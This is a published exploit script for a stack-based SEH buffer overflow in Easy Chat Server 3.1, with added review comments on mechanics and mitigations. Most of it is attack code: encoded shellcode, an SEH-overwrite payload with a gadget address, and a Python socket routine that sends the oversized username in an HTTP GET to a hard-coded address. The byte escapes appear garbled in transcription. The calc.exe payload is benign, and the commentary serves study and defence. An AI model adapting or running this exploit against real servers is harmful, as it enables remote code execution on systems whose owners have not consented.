
Easy Chat Server 3.1 Stack Buffer Overflow

Posted on 13 May 2014

# Exploit Title: Easy Chat Server 3.1 stack buffer overflow
# Date: 9 May 2014
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.echatserver.com/
# Software Link: http://www.echatserver.com/
# Version: 3.1
# Tested on: Windows 7 Enterprise SP1, English
#
# Description:
# A buffer overflow is triggered when passing a long username.
#
# NOTE(review): this is the listing as published. Line breaks and the
# backslashes of the byte-escape sequences appear to have been lost in
# transcription (the literals below read "xd9xcb..." rather than escapes),
# so the bytes shown are the author's values as transcribed. The review
# comments below describe what the request looks like on the wire and which
# platform mitigations bear on this exploit pattern.

import socket
import struct  # imported but never used in this listing

# calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
# msfencode -b "x00x20" -i w32-exec-calc-shellcode.bin
# [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
#
# The payload only launches calc.exe, a benign proof-of-execution marker.
# The msfencode "-b" option lists the bytes that must not appear in the
# output -- apparently NUL and space, consistent with the payload travelling
# inside a URL query string. Per the msfencode output the encoded stub is
# 101 bytes long.
shellcode = (
    "xd9xcbxbexb9x23x67x31xd9x74x24xf4x5ax29xc9" +
    "xb1x13x31x72x19x83xc2x04x03x72x15x5bxd6x56" +
    "xe3xc9x71xfax62x81xe2x75x82x0bxb3xe1xc0xd9" +
    "x0bx61xa0x11xe7x03x41x84x7cxdbxd2xa8x9ax97" +
    "xbax68x10xfbx5bxe8xadx70x7bx28xb3x86x08x64" +
    "xacx52x0ex8dxddx2dx3cx3cxa0xfcxbcx82x23xa8" +
    "xd7x94x6ex23xd9xe3x05xd4x05xf2x1bxe9x09x5a" +
    "x1cx39xbd"
)

# SEH overwritten at offset 207 when Easy Chat Server is
# installed in C:Program FilesEFS SoftwareEasy Chat Server
#
# Classic SEH-record overwrite: at offset 203 the 4-byte "next SEH" pointer
# is replaced with a short forward jump, and at offset 207 the handler
# pointer is replaced with the address of a pop/pop/ret gadget. The gadget
# is taken from SSLEAY32.DLL; for the overwritten handler to be honoured
# that module presumably has no SafeSEH table and the process runs without
# SEHOP/DEP -- the author does not say, so confirm. Those mitigations
# (SafeSEH, SEHOP, DEP) are what defeats this pattern in general. The author
# also ties the offset to the install path, so it is not portable across
# installations.
payload = "A"*203                          # filler up to the SEH record
payload += "xebx06x90x90"                   # short jmp to shellcode (nSEH slot: jmp +6 then two nops)
payload += "x1ex0ex01x10"                   # pop/pop/ret @ 0x10010E1E SSLEAY32.DLL (handler slot)
payload += "x81xc4xd8xfexffxff"             # add esp,-128 (stack adjust before the decoder stub runs)
payload += shellcode                       # calc.exe
payload += "D"*193                         # trailing filler

# The overflow is reached through an ordinary HTTP GET to /chat.ghp with an
# oversized "username" query parameter (203+4+4+6+101+193 = 511 bytes, taking
# the shellcode length from the msfencode output). The payload bytes are
# concatenated raw, not URL-encoded. A length bound on that parameter at the
# server, or a WAF/IDS rule on query-parameter length and on non-printable
# bytes in the query string, would catch this class of request.
#
# NOTE(review): as transcribed the header lines carry no CRLF terminators,
# and the Host/Referer address (192.168.1.136) differs from the address the
# socket connects to (192.168.123.131). Both look like private lab
# addresses; nothing here shows the server validating Host.
buf = (
    "GET /chat.ghp?username=" + payload + "&password=&room=1&sex=1 HTTP/1.1 "
    "User-Agent: Mozilla/4.0 "
    "Host: 192.168.1.136:80 "
    "Accept-Language: en-us "
    "Accept-Encoding: gzip, deflate "
    "Referer: http://192.168.1.136 "
    "Connection: Keep-Alive "
)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.123.131", 80))         # target address is hard-coded
s.send(buf)                                # send() may write fewer bytes than len(buf); return value is not checked
print s.recv(1024)                         # Python 2 print statement; the socket is never closed

 
